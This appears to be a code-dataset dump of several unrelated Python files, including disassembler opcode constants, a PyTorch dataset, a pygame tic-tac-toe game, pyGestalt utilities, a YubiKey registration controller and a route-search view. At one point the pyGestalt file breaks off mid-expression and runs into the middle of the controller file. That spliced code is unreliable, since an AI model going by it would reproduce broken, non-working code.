0x09\nINS_ROR= INS_ARITH | 0x0A\n\nINS_AND= INS_LOGIC | 0x01\nINS_OR = INS_LOGIC | 0x02\nINS_XOR= INS_LOGIC | 0x03\nINS_NOT= INS_LOGIC | 0x04\nINS_NEG= INS_LOGIC | 0x05\n \nINS_PUSH= INS_STACK | 0x01\nINS_POP = INS_STACK | 0x02\nINS_PUSHREGS= INS_STACK | 0x03 \nINS_POPREGS= INS_STACK | 0x04 \nINS_PUSHFLAGS= INS_STACK | 0x05 \nINS_POPFLAGS= INS_STACK | 0x06 \nINS_ENTER= INS_STACK | 0x07\nINS_LEAVE = INS_STACK | 0x08\n\nINS_TEST = INS_COND | 0x01\nINS_CMP = INS_COND | 0x02\n \nINS_MOV = INS_LOAD | 0x01\nINS_MOVCC = INS_LOAD | 0x02\nINS_XCHG = INS_LOAD | 0x03\nINS_XCHGCC = INS_LOAD | 0x04\nINS_LEA = INS_LOAD | 0x05\n \nINS_STRCMP = 
INS_ARRAY | 0x01\nINS_STRLOAD = INS_ARRAY | 0x02\nINS_STRMOV = INS_ARRAY | 0x03\nINS_STRSTOR = INS_ARRAY | 0x04\nINS_XLAT = INS_ARRAY | 0x05\n \nINS_BITTEST = INS_BIT | 0x01\nINS_BITSET = INS_BIT | 0x02\nINS_BITCLR = INS_BIT | 0x03\n\nINS_CLEARCF = INS_FLAG | 0x01\nINS_CLEARZF = INS_FLAG | 0x02 \nINS_CLEAROF = INS_FLAG | 0x03\nINS_CLEARDF = INS_FLAG | 0x04\nINS_CLEARSF = INS_FLAG | 0x05 \nINS_CLEARPF = INS_FLAG | 0x06 \nINS_SETCF = INS_FLAG | 0x07\nINS_SETZF = INS_FLAG | 0x08\nINS_SETOF = INS_FLAG | 0x09\nINS_SETDF = INS_FLAG | 0x0A\nINS_SETSF = INS_FLAG | 0x0B\nINS_SETPF = INS_FLAG | 0x0C\nINS_TOGCF = INS_FLAG | 0x10 #/* toggle */\nINS_TOGZF = INS_FLAG | 0x20\nINS_TOGOF = INS_FLAG | 0x30\nINS_TOGDF = INS_FLAG | 0x40\nINS_TOGSF = INS_FLAG | 0x50\nINS_TOGPF = INS_FLAG | 0x60\n\nINS_TRAP = INS_TRAPS | 0x01 #/* generate trap */\nINS_TRAPCC= INS_TRAPS | 0x02 #/* conditional trap gen */\nINS_TRET = INS_TRAPS | 0x03 #/* return from trap */\nINS_BOUNDS= INS_TRAPS | 0x04 #/* gen bounds trap */\nINS_DEBUG = INS_TRAPS | 0x05 #/* gen breakpoint trap */\nINS_TRACE = INS_TRAPS | 0x06 #/* gen single step trap */\nINS_INVALIDOP= INS_TRAPS | 0x07 #/* gen invalid instruction */\nINS_OFLOW = INS_TRAPS | 0x08 #/* gen overflow trap */\n \n#/* INS_SYSTEM */\nINS_HALT = INS_SYSTEM | 0x01 # /* halt machine */\nINS_IN = INS_SYSTEM | 0x02 # /* input form port */\nINS_OUT = INS_SYSTEM | 0x03 # /* output to port */\nINS_CPUID = INS_SYSTEM | 0x04 # /* iden\n\nINS_NOP = INS_OTHER | 0x01\nINS_BCDCONV = INS_OTHER | 0x02 #/* convert to/from BCD */\nINS_SZCONV = INS_OTHER | 0x03 #/* convert size of operand */\n\n\nOP_R= 0x001 \nOP_W= 0x002 \nOP_X= 0x004 \nOP_64AUTO= 0x008 # operand is in 64bit mode with amd64!\n\nOP_UNK= 0x000 \nOP_REG= 0x100 \nOP_IMM= 0x200 \nOP_REL= 0x300 \nOP_ADDR= 0x400 \nOP_EXPR= 0x500 \nOP_PTR = 0x600 \nOP_OFF = 0x700 \n\nOP_SIGNED= 0x001000 \nOP_STRING= 0x002000 \nOP_CONST = 0x004000\n\nARG_NONE = 0\ncpu_8086 = 0x00001000\ncpu_80286= 0x00002000\ncpu_80386= 0x00003000\ncpu_80387= 0x00004000\ncpu_80486= 0x00005000\ncpu_PENTIUM= 0x00006000\ncpu_PENTPRO= 0x00007000\ncpu_PENTMMX= 0x00008000\ncpu_PENTIUM2= 0x00009000\ncpu_AMD64= 0x0000a000\n\n#import envi.archs.i386.regs as e_i386_regs\n# Relative import priority...\n\n#eventually, change this for your own codes\n#ADDEXP_SCALE_OFFSET= 0 \n#ADDEXP_INDEX_OFFSET= 8\n#ADDEXP_BASE_OFFSET = 16\n#ADDEXP_DISP_OFFSET = 24\n#MODRM_EA = 1\n#MODRM_reg= 0\nADDRMETH_MASK = 0x00FF0000\nOPTYPE_MASK = 0xFF000000\nOPFLAGS_MASK = 0x0000FFFF\n\n","repo_name":"bat-serjo/vivisect-py3","sub_path":"varchs/i386/opconst.py","file_name":"opconst.py","file_ext":"py","file_size_in_byte":10291,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"2081762295","text":"import os\n\nfrom torch.utils.data import Dataset\nfrom PIL import Image\nimport glob\n\nclass CustomDataset(Dataset) :\n def __init__(self, data_dir, transform=None):\n self.data_dir = glob.glob(os.path.join(data_dir,\"*\", \"*\", \"*.jpg\"))\n\n self.transform = transform\n self.label_dict = self.create_label_dict(data_dir)\n\n def create_label_dict(self, data_dir):\n\n label_dict = {}\n for root, dirs, files in os.walk(data_dir):\n if len(dirs) == 0:\n label_name = os.path.basename(root)\n label_dict[label_name] = len(label_dict)\n\n return label_dict\n\n\n\n def __getitem__(self, item):\n image_path = self.data_dir[item]\n image = Image.open(image_path)\n image = image.convert(\"RGB\")\n label_name = os.path.basename(os.path.dirname(image_path))\n label = 
self.label_dict[label_name]\n\n if self.transform is not None :\n image = self.transform(image)\n\n return image ,label\n\n def __len__(self):\n return len(self.data_dir)\n","repo_name":"1107c/recommend","sub_path":"train/customdataset.py","file_name":"customdataset.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5328872052","text":"import pygame\nimport math\nfrom math import inf\n\npygame.init()\n\n# Screen\nWIDTH = 500\nROWS = 3\nwin = pygame.display.set_mode((WIDTH, WIDTH))\npygame.display.set_caption(\"TicTacToe\")\n\n\n# Colors\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nGRAY = (200, 200, 200)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\n\n# Images\nX_pic = pygame.transform.scale(\n pygame.image.load(\"Images/x.png\"), (150, 150))\nO_pic = pygame.transform.scale(\n pygame.image.load(\"Images/o.png\"), (150, 150))\n\n# Fonts\nEND_FONT = pygame.font.SysFont('Arial', 40)\n\n\ndef draw_grid():\n gap = WIDTH // ROWS\n\n # Starting points\n x = 0\n y = 0\n\n for i in range(ROWS):\n x = i * gap\n\n pygame.draw.line(win, GRAY, (x, 0), (x, WIDTH), 3)\n pygame.draw.line(win, GRAY, (0, x), (WIDTH, x), 3)\n\n\ndef grid_init():\n dis_to_cen = WIDTH // ROWS // 2\n\n # Initializing board array\n brd = [[None, None, None], [None, None, None], [None, None, None]]\n\n for i in range(len(brd)):\n for j in range(len(brd[i])):\n x = dis_to_cen * (2 * j + 1)\n y = dis_to_cen * (2 * i + 1)\n\n # Adding centre\n brd[i][j] = (x, y, '', True)\n\n return brd\n\n\ndef emptyCells(brd):\n empty = []\n for i in range(3):\n for j in range(3):\n if brd[i][j][3] == True:\n empty.append([i, j])\n return empty\n\n\ndef click(brd, turn):\n\n # Mouse position\n m_x, m_y = pygame.mouse.get_pos()\n\n for i in range(len(brd)):\n for j in range(len(brd[i])):\n x, y, char, can_play = brd[i][j]\n # Distance between mouse and the centre of the square\n dis = math.sqrt((x - m_x) ** 2 + (y - m_y) ** 2)\n print([x, y, m_x, m_y, dis])\n\n # If it's X's turn\n if turn == 1:\n\n # If it's inside the square\n if dis < WIDTH // ROWS // 2 and can_play:\n images.append((x, y, X_pic))\n brd[i][j] = (x, y, 1, False)\n return\n\n # If it's O's turn\n elif turn == -1:\n if len(emptyCells(brd)) % 2 == 1 and choice == 1:\n return\n if len(emptyCells(brd)) % 2 == 0 and choice == 2:\n return\n result = Position(\n AlphaBetaMM(brd, len(emptyCells(brd)), -inf, inf, -1))\n images.append((result[0], result[1], O_pic))\n if result[2] == i and result[3] == j and can_play:\n brd[result[2]][result[3]] = (\n result[0], result[1], -1, False)\n return\n\n\n# Check if someone has won\ndef who_won(brd):\n\n win_states = [[brd[0][0][2], brd[0][1][2], brd[0][2][2]],\n [brd[1][0][2], brd[1][1][2], brd[1][2][2]],\n [brd[2][0][2], brd[2][1][2], brd[2][2][2]],\n [brd[0][0][2], brd[1][0][2], brd[2][0][2]],\n [brd[0][1][2], brd[1][1][2], brd[2][1][2]],\n [brd[0][2][2], brd[1][2][2], brd[2][2][2]],\n [brd[0][0][2], brd[1][1][2], brd[2][2][2]],\n [brd[0][2][2], brd[1][1][2], brd[2][0][2]]]\n\n if [1, 1, 1] in win_states:\n #display_message(\"X has won!\")\n return 1\n\n elif [-1, -1, -1] in win_states:\n #display_message(\"O has won!\")\n return -1\n\n return False\n\n\ndef has_drawn(brd):\n for i in range(3):\n for j in range(3):\n if brd[i][j][2] == '':\n return False\n\n display_message(\"Draw\")\n return True\n\n\ndef display_message(content):\n pygame.time.delay(500)\n win.fill(WHITE)\n if content[0] == 'X':\n end_text = END_FONT.render(content, 1, RED)\n elif 
content[0] == 'O':\n end_text = END_FONT.render(content, 1, BLUE)\n elif content[0] == 'D':\n end_text = END_FONT.render(content, 1, BLACK)\n win.blit(end_text, ((WIDTH - end_text.get_width()) //\n 2, (WIDTH - end_text.get_height()) // 2))\n pygame.display.update()\n pygame.time.delay(2000)\n\n\ndef render():\n win.fill(WHITE)\n draw_grid()\n\n # Drawing X's and O's\n for image in images:\n x, y, IMAGE = image\n win.blit(IMAGE, (x - IMAGE.get_width() //\n 2, y - IMAGE.get_height() // 2))\n\n pygame.display.update()\n\n\ndef getScore(brd):\n if who_won(brd) == 1:\n return 10\n\n elif who_won(brd) == -1:\n return -10\n\n else:\n return 0\n\n\ndef AlphaBetaMM(brd, depth, alpha, beta, player):\n row = -1\n col = -1\n if depth == 0 or who_won(brd) == 1 or who_won(brd) == -1:\n return [row, col, getScore(brd)]\n else:\n for cell in emptyCells(brd):\n brd[cell[0]][cell[1]] = (\n PosXY(cell[1]), PosXY(cell[0]), player, False)\n score = AlphaBetaMM(brd, depth - 1, alpha, beta, -player)\n if player == 1:\n # X is the max player\n if score[2] > alpha:\n alpha = score[2]\n row = cell[0]\n col = cell[1]\n\n else:\n if score[2] < beta:\n beta = score[2]\n row = cell[0]\n col = cell[1]\n\n brd[cell[0]][cell[1]] = (\n PosXY(cell[1]), PosXY(cell[0]), '', True)\n\n if alpha >= beta:\n break\n\n if player == 1:\n return [row, col, alpha]\n\n else:\n return [row, col, beta]\n\n\ndef Position(pos):\n dis_to_cen = WIDTH // ROWS // 2\n y = dis_to_cen * (2 * pos[0] + 1)\n x = dis_to_cen * (2 * pos[1] + 1)\n return [x, y, pos[0], pos[1]]\n\n\ndef PosXY(pos):\n dis_to_cen = WIDTH // ROWS // 2\n x = dis_to_cen * (2 * pos + 1)\n return x\n\n\ndef main():\n global images, draw, choice\n images = []\n draw = False\n\n run = True\n\n choice = int(input(\"You want to go first or second?(1/2)\"))\n\n brd = grid_init()\n if(choice == 1):\n print('')\n else:\n click(brd, -1)\n while run:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n click(brd, 1)\n click(brd, -1)\n print(emptyCells(brd))\n print(brd)\n\n render()\n\n if who_won(brd) == 1 or who_won(brd) == -1 or has_drawn(brd):\n if who_won(brd) == 1:\n display_message(\"X has won!\")\n elif who_won(brd) == -1:\n display_message(\"O has won!\")\n run = False\n\n\nwhile True:\n if __name__ == '__main__':\n main()\n","repo_name":"f1379d/AI-Alghoritmes","sub_path":"TicTacToe/TicTacToeGame.py","file_name":"TicTacToeGame.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27330000010","text":"# pyGestalt Utilities Module\n\n\"\"\"Provides a host of common utility functions used across the pyGestalt framework.\"\"\"\n\n\n#---- IMPORTS ----\nimport math\nimport ast\nimport datetime\nimport itertools\nimport sys\nfrom pygestalt import config\n\n\ndef callFunctionAcrossMRO(instance, functionName, args = (), kwargs = {}, parentToChild = True):\n \"\"\"Calls a function on all classes in instance's method resolution order.\n \n instance -- the instance to be provided to the class methods, and also used to pull the method resolution order list.\n functionName -- the name of the function to be called\n args -- positional arguments to be passed to the function\n kwargs -- keyward arguments to be passed to the function\n parentToChild -- affects the order in which base classes are called. 
If true, will walk up derived classes from the basest base class.\n    \n    This function is particularly useful in initialization routines where the same function must be called across multiple derived classes.\n    \n    Note that this only currently works with functions that do not return anything.\n    \"\"\"\n    \n    mro = instance.__class__.mro() #grab the MRO from the instance\n    if parentToChild:\n        mro.reverse() #need to reverse MRO so iterates up derived class chain\n    \n    for thisClass in mro: #iterate over classes in method resolution order\n        if functionName in thisClass.__dict__: #check to make sure class has function defined in __dict__. This prevents calling a base class's method multiple times.\n            thisClass.__dict__[functionName](instance, *args, **kwargs) #call class function on instance with provided arguments\n\n\ndef objectIdentifier(callingObject):\n    \"\"\"Returns a human-readable string identifier for a provided object.\n    \n    callingObject -- the object to be identified\n    \n    This method figures out the best name to use in identifying an object, taking cues from:\n    - its _name_ attribute, if available\n    - more to be added as this evolves...\n    \n    Returns a string that can be used to identify the object to the user.\n    \"\"\"\n    if hasattr(callingObject, '_name_'): #object has a _name_ attribute\n        name = getattr(callingObject, '_name_')\n        if name: #name is not False (or None)\n            return name #just return the name\n        else: #name is False or None\n            return callingObject.__class__.__name__ + \" @ \" + hex(id(callingObject)) #_name_ is None or False, return a reinterpretation of the str representation\n    else:\n        return callingObject.__class__.__name__ + \" @ \" + hex(id(callingObject)) #no _name_ attribute, return a reinterpretation of the object str representation    \n    \n    \ndef notice(callingObject, noticeString):\n    \"\"\"Prints a formatted notice in the terminal window that includes the name of the source.\n    \n    callingObject -- the instance object making the call\n    noticeString -- the message to be printed\n    \n    For now this function just prints to the terminal, but eventually it could publish to a browser-based interface etc...\n    \"\"\"\n    print(\"[\" + objectIdentifier(callingObject) + \"] \" + str(noticeString)) #print objectRepr: message\n\ndef printToTerminal(text, newLine = True):\n    \"\"\"Prints text to the terminal window, with or without a carriage return.\"\"\"\n    if newLine == True: #print with carriage return\n        print(text)\n    else: #print without carriage return\n        sys.stdout.write(text)\n        sys.stdout.flush()
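\n\n# Added illustrative sketch (not part of the original module): a minimal, hypothetical\n# hierarchy showing the parent-first call order produced by callFunctionAcrossMRO.\nclass _DemoBase(object):\n    def _onInit(self): print('base init') #called first when parentToChild is True\n\nclass _DemoChild(_DemoBase):\n    def _onInit(self): print('child init') #called second\n\n# callFunctionAcrossMRO(_DemoChild(), '_onInit') would print 'base init', then 'child init'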
\n\ndef debugNotice(callingObject, channel, noticeString, padding = False, newLine = True):\n    \"\"\"If global verbose debug is enabled, this function will print a formatted notice in the terminal window or alternate target.\n    \n    callingObject -- the instance object making the call\n    channel -- a string channel name, which allows filtering debug output if desired (not currently enabled)\n    noticeString -- the message to be printed\n    padding -- if true, inserts a carriage return to pad the top of the notice\n    newLine -- if false, will output without a newline character\n    \n    Currently assigned channels:\n    comm -- messages related to communications. Mostly coming from the interfaces module.\n    units -- messages related to dimensionality of numbers\n    persistence -- messages related to virtual machine persistence\n    \n    Returns True if notice was printed (verbose debug is enabled), or False otherwise\n    \"\"\"\n    if config.verboseDebug() and config.debugChannelEnabled(channel):\n        if padding: print(\"\")\n        if callingObject == None:\n            printToTerminal(str(noticeString), newLine)\n        elif type(callingObject) == str:\n            printToTerminal(\"[\" + callingObject + \"] \" + noticeString, newLine)\n        else:\n            printToTerminal(\"[\" + objectIdentifier(callingObject) + \"] \" + str(noticeString), newLine)\n        return True\n    else:\n        return False\n\ndef generatePersistenceManager(inputArgument, namespace = None):\n    \"\"\"Generates a persistence manager based on an input argument.\n    \n    A persistence manager is a utility object that aids in storing persistent data that must be saved after the interpreter shuts\n    down. This function will interpret the input argument provided and will return an appropriate\n    persistence manager object if possible.\n    \n    inputArgument -- if a True Bool: a generic persistence file will be used.\n                  -- if a String: the string will be interpreted as a filename for the persistence file.\n                  -- if a utilities.persistenceManager object: the object will be used directly.\n    \n    namespace -- a text string used to specify a namespace for the persistence manager. This allows multiple identical VMs to share\n                 a common persistence file.\n    \"\"\"\n    if type(inputArgument) == bool and inputArgument:\n        #a True bool was provided as the input argument. Create a new persistence manager that uses a default file.\n        persistenceFilename = \"defaultPersistence.vmp\"\n        return persistenceManager(persistenceFilename, namespace)\n    \n    elif type(inputArgument) == str:\n        #A string was provided as the persistence manager, so use that string as the filename\n        return persistenceManager(inputArgument, namespace)\n    \n    elif type(inputArgument) == persistenceManager:\n        # a persistenceManager object was provided, so use that.\n        if namespace:\n            inputArgument.namespace = namespace #update the namespace used by the persistence manager\n        return inputArgument\n    \n    else:\n        return None\n    \nclass persistenceManager(object):\n    '''Provides a unified interface to persistence files.\n    \n    One of the challenges of Gestalt is maintaining state variables that are generated at run-time and should be recalled\n    after the Python interpreter is restarted. The classic use-case is maintaining the network address data that is used\n    to associate virtual nodes with their physical counterparts. When a networked node is initialized, the user is asked\n    to press a physical button to create the association. This causes the node to adopt the randomly generated address\n    transmitted as part of the association request. It ends up being a huge pain to need to redo this association every\n    time the virtual machine is restarted. A solution to this is to store the node and address information in a\n    'persistence file'. However it is possible to use persistence to store other information. \n    \n    To keep the concept of persistence as general as possible, the persistence manager simply provides methods to store persistence \n    information to a file as key-value pairs, and to read it back. The only embellishment is that a namespace can be provided, \n    which will be pre-pended followed by a dot to all keys. 
This enables multiple instances of a single virtual machine to \n    share a common persistence file.\n    '''\n    \n    def __init__(self, filename = None, namespace = None):\n        \"\"\"Initializes the persistence manager.\n        \n        filename -- the text string filename to be used for storing the persistence dictionary.\n        namespace -- an additional pre-pending text string identifier that enables further specificity in key names.\n                     Note that this namespace string will be pre-pended to all key names: namespace.key\n        \"\"\"\n        self.filename = filename\n        self.namespace = namespace\n        \n    def __call__(self):\n        \"\"\"Returns self if the persistence manager instance is valid.\n        \n        Note that validity just means a filename has been provided. This enables a call to persistenceManagerInstance()\n        to determine if it's possible to store persistence information.\n        \"\"\"\n        if self.filename: return self #valid filename\n        else: return False    \n\n    def get(self, key):\n        \"\"\"Returns a key stored in the persistence file.\n        \n        key -- the string key of a value to be retrieved.\n        \n        returns value\n        \"\"\"\n        \n        persistenceDictionary = self.readPersistenceDictionary() #read in persistence dictionary from file.\n        \n        if self.namespace: #a namespace is used\n            key = self.namespace + '.' + key #prepend namespace\n        \n        if key in persistenceDictionary:\n            return persistenceDictionary[key]\n        else:\n            debugNotice(self, 'persistence', 'Unable to retrieve persistence key ' + str(key) + ' from persistence file.')\n            return None\n\n    def __getitem__(self, key):\n        \"\"\"Allows access of values with persistenceManager[key] notation.\"\"\"\n        return self.get(key)\n\n\n    def set(self, key, value):\n        \"\"\"Stores a new key-value pair in the persistence file.\n        \n        key -- the string key of the value to be stored.\n        value -- the value to be stored.\n        \"\"\"\n        \n        persistenceDictionary = self.readPersistenceDictionary() #read in persistence dictionary from file.\n        \n        if self.namespace: #a namespace is used\n            key = self.namespace + '.' + key\n        \n        persistenceDictionary.update({key: value}) #update the dictionary\n        self.writePersistenceDictionary(persistenceDictionary) #write back out the dictionary\n\n    def __setitem__(self, key, value):\n        \"\"\"Allows setting key:value pairs with persistenceManagerInstance[key] = value notation.\"\"\"\n        self.set(key, value)\n    \n    def readPersistenceDictionary(self):\n        \"\"\"Reads a string-encoded dictionary from a persistence file and returns it as a dictionary object.\n        \n        Returns the stored dictionary object.\n        \"\"\"\n        try: #try to read in a dictionary\n            fileObject = open(self.filename, 'rU')\n            persistenceDictionary = ast.literal_eval(fileObject.read()) #safely evaluate the dictionary.\n            fileObject.close() #close out the dictionary so it is available for other persistenceManager instances.\n            return persistenceDictionary\n        except IOError as e: #had an IO error, so return an empty dictionary. Maybe the file doesn't exist?\n            debugNotice(self, 'persistence', e)\n            return {}\n    \n    def writePersistenceDictionary(self, persistenceDictionary):\n        \"\"\"Stores a dictionary to the persistence file.\n        \n        persistenceDictionary -- the dictionary object to be stored.\n        \"\"\"\n        fileObject = open(self.filename, 'w')\n        fileObject.write(\"# This pyGestalt persistence file was auto-generated @ \" + str(datetime.datetime.now()) + \"\\n\")\n        fileObject.write(\"{\\n\")\n        for key in persistenceDictionary:\n            value = persistenceDictionary[key]\n            if type(value) == str: #need to wrap value in quotes so it gets parsed correctly on read\n                formattedValue = '\"'+value + '\"'\n            else:\n                formattedValue = str(value)\n            \n            fileObject.write(\"'\" + key + \"'\" + \":\" + formattedValue + \",\\n\")\n        fileObject.write(\"}\")\n        fileObject.close()
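\n\n# Added illustrative sketch (not part of the original module): hypothetical usage of\n# persistenceManager, with a made-up filename and namespace.\ndef _persistenceDemo():\n    pm = persistenceManager('demoPersistence.vmp', namespace = 'leftActuator')\n    pm['address'] = 7 #written to disk under the key 'leftActuator.address'\n    return pm['address'] #reads back 7, even after the interpreter restarts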
\n    \n\ndef unsignedIntegerToBytes(integer, numbytes):\n    \"\"\"Converts an unsigned integer into a sequence of bytes, LSB first.\n    \n    integer -- the number to be converted\n    numbytes -- the number of bytes to be used in representing the integer\n    \"\"\"\n    bytes = list(range(numbytes))\n    for i in bytes:\n        bytes[i] = int(integer%256)\n        integer -= integer%256\n        integer = int(integer//256)\n    \n    if integer>0: raise IndexError('Overflow in conversion between uint and byte list.')\n    else: return bytes\n    \ndef bytesToUnsignedInteger(byteList):\n    \"\"\"Converts a little-endian sequence of bytes into an unsigned integer.\"\"\"\n    value = 0 #initialize at 0\n    for order, byte in enumerate(byteList):\n        value += byte*(256**order)\n    return value\n\n\ndef signedIntegerToTwosComplement(integer, bitSize):\n    \"\"\"Converts a signed integer into an unsigned two's complement representation.\n    \n    integer -- the number to be converted.\n    bitSize -- the length in bits of the two's complement number to be returned.\n    \"\"\"\n    maxSize = (2**bitSize)/2 - 1\n    if abs(integer) > maxSize: #integer cannot be expressed in size\n        raise ValueError(\"Cannot convert signed integer to twos complement. Input value of \" + str(integer) + \" exceeds maximum size (+/- \" + str(maxSize)+\").\")    \n    if integer >= 0: return int(integer) #integer is positive, so nothing needs to be done.\n    else:\n        allOnes = 2**bitSize - 1 # fills bitSize bits with all ones\n        return (allOnes^abs(int(integer))) + 1 #inverts just the bits comprising the original number, and adds one. This is two's complement!
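\n\n# Added illustrative worked example (not part of the original module), assuming an\n# 8-bit representation; names below resolve at call time, so the forward reference\n# to twosComplementToSignedInteger is fine.\ndef _conversionDemo():\n    assert signedIntegerToTwosComplement(-5, 8) == 0xFB #(255 ^ 5) + 1 = 251 = 0b11111011\n    assert twosComplementToSignedInteger(0xFB, 8) == -5 #round trip back to -5\n    assert unsignedIntegerToBytes(1000, 2) == [232, 3] #little-endian: 232 + 3*256 = 1000\n    assert bytesToUnsignedInteger([232, 3]) == 1000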
\n\ndef twosComplementToSignedInteger(twosComplement, bitSize):\n    \"\"\"Converts a twos-complement representation into a signed integer.\n    \n    twos-complement -- the number to be converted.\n    bitSize -- the length in bits of the two's complement input.\n    \"\"\"\n    \n    signBitPosition = bitSize - 1 #sign bit is the most significant bit\n    signBit = 2**signBitPosition #a single bit in the MSB position\n    if(signBit & twosComplement): #number is negative, need to take two's complement\n        allOnes = 2**bitSize - 1 # fills bitSize bits with all ones\n        return -((twosComplement - 1)^allOnes) #subtract one then flip bits, this is the inverse of the encoding process.\n    else:\n        return twosComplement #positive number, no need to do anything.\n    \ndef flattenList(inputList):\n    \"\"\"Flattens shallow nested lists into a single list.\n    \n    Note that this will only work for nesting that is one level deep.\n    \"\"\"\n    outputList = []\n    for item in inputList:\n        if hasattr(item, '__iter__'): outputList += item\n        else: outputList += [item] #catches case that item is not a list, and doesn't need to be flattened.\n    return outputList\n\ndef listToString(inputList):\n    \"\"\"Converts a list of integers into an ASCII string.\"\"\"\n    return ''.join([chr(i) for i in inputList])\n\ndef stringToList(inputString):\n    \"\"\"Convert a string into a list of integers.\"\"\"\n    return [ord(i) for i in inputString]\n\ndef changeBitInInteger(integer, bitPosition, bitValue):\n    \"\"\"Modifies a provided integer by either setting or clearing a specified bit.\n    \n    integer -- the number in which to modify a bit\n    bitPosition -- the position of the bit in the integer, starting with the LSB = 0\n    bitValue -- the value to which the bit should be changed, either True or False\n    \n    returns the modified integer.\n    \"\"\"\n    shiftedBitValue = 1< 0:\n            c.replay = True\n            api_key = api[0].api.key\n        else:\n            c.replay = False\n            api_key = generate_api()\n\n        # crypt AES key\n        crypted = xtea.crypt(self.xtea_key, aes).encode('hex')\n\n        # last check : is this AES unique ?\n        if Session.query(id_AES).filter(id_AES.aes == crypted).count() != 0:\n            redirect_to(action=\"index\", msg=\"Bad AES - Please generate a new one.\")\n\n        # create new key object\n        key = Key()\n        key.private_id = secret_id\n        key.public_id = public_id\n        key.email = mail\n\n        # create new key - AES part\n        new_aes = id_AES()\n        new_aes.aes = crypted\n        Session.add(new_aes)\n        Session.commit()\n        id_aes = Session.query(id_AES).filter(id_AES.aes == crypted).one().id\n        # add ID to key\n        key.id_aes = id_aes\n\n        # create new key - API part\n        if c.replay:\n            key.api_key = api[0].api.id\n        else:\n            api = API()\n            api.key = api_key\n            Session.add(api)\n            Session.commit()\n            api_id = Session.query(API).filter(API.key == api_key).one().id\n            key.api_key = api_id\n\n        Session.add(key)\n        Session.commit()\n        \n        c.api_key = api_key\n        \n        return render('/addkey/success.html')\n","repo_name":"cjeanneret/yubilons","sub_path":"yubichecker/controllers/addkey.py","file_name":"addkey.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
{"seq_id":"7971441971","text":"from django.http import HttpResponse\nfrom django.http import Http404\nfrom django.template import Context, loader , RequestContext\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\nfrom django import forms\nfrom django.forms import ModelForm\n\nfrom ragendja.auth.decorators import staff_only\nfrom ragendja.template import 
render_to_response\nfrom gogogo.models import *\nfrom ragendja.dbutils import get_object_or_404\n#from gogogo.views.db import reverse as db_reverse\nfrom django.core.urlresolvers import reverse\nfrom gogogo.models.loaders import ListLoader\n\nimport cgi\nimport logging\n\ndef search(request):\n \"\"\"\n Route searching\n \"\"\"\t\n error = None\n agency = None\n if \"agency\" in request.GET:\n agency_id = request.GET['agency']\n agency = db.Key.from_path(Agency.kind(),agency_id)\n\n if \"keyword\" not in request.GET:\n return render_to_response( \n request,\n 'gogogo/route/search.html'\n ,{ \n 'page_title': _(\"Route searching\"),\n 'result' : [],\n 'error' : _(\"Error! No keyword provided!\")\n })\n \n keyword = request.GET['keyword']\n keyword = keyword.lower()\n\n route_list_loader = ListLoader(Route)\n route_list_loader.load()\n \n route_list = route_list_loader.get_data()\n \n result = []\n \n agency_property = getattr(Route,\"agency\")\n\n for route in route_list:\n if agency:\n key = agency_property.get_value_for_datastore(route)\n if agency != key:\n continue\n \n if route.short_name.lower().find(keyword) != -1:\n result.append(route)\n continue\n \n for name in route.long_name:\n if name.lower().find(keyword)!= -1:\n result.append(route)\n continue\n \n result = [trEntity(createEntity(route),request) for route in result ]\n \n return render_to_response( \n request,\n 'gogogo/route/search.html'\n ,{ \n 'page_title': _(\"Route searching\"),\n 'result' : result,\n 'error' : error\n })\t\t\n\t\n","repo_name":"gogogo/gogogo-hk","sub_path":"gogogo/views/db/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"13727702973","text":"TEXT = \"\\\nNAME\\n\\\n moonsim - a simple moon simulator.\\n\\\n\\n\\\nSYNOPSIS\\n\\\n python3 moonsim [OPTION] []\\n\\\n\\n\\\nDESCRIPTION\\n\\\n This help page documents the options available when envoking\\n\\\n moonsim with the Python interpreter. See the README.md for\\n\\\n more information about the program.\\n\\\n\\n\\\nOPTIONS\\n\\\n --version\\n\\\n Display current version.\\n\\\n\\n\\\n -l, --license\\n\\\n Display the full license.\\n\\\n\\n\\\n -h, --help\\n\\\n Display this help screen.\\n\\\n\\n\\\n -d, --display\\n\\\n Display the simulation parameters including total,\\n\\\n potential and kinetic energy, position, velocity,\\n\\\n total time elapsed, frame rate, etc.\\n\\\n\\n\\\n -p, --perigee\\n\\\n Begin with the moon at perigee. This is the default.\\n\\\n\\n\\\n -a, --apogee\\n\\\n Begin with the moon at apogee.\\n\\\n\\n\\\nARGUMENTS\\n\\\n [ ]\\n\\\n Width and height of the window. 
The default is 800x800.\\n\\\n\\n\\\nAUTHOR\\n\\\n    Written by Mark Walter Ruszczycky.\\n\\\n    mwruszczycky@gmail.com\\n\\\n\\n\\\nCOPYRIGHT\\n\\\n    Copyright (c) 2015 Mark Walter Ruszczycky.\\n\\\n    License: BSD 3-Clause, http://opensource.org/licenses/BSD-3-Clause.\\n\\\n\\n\\\nSEE ALSO\\n\\\n    The README.md included with this program provides a detailed\\n\\\n    description of its operation and usage.\\n\"\n","repo_name":"MWRuszczycky/SimpleMoonSimulator","sub_path":"moonsim/resources/help_screen.py","file_name":"help_screen.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
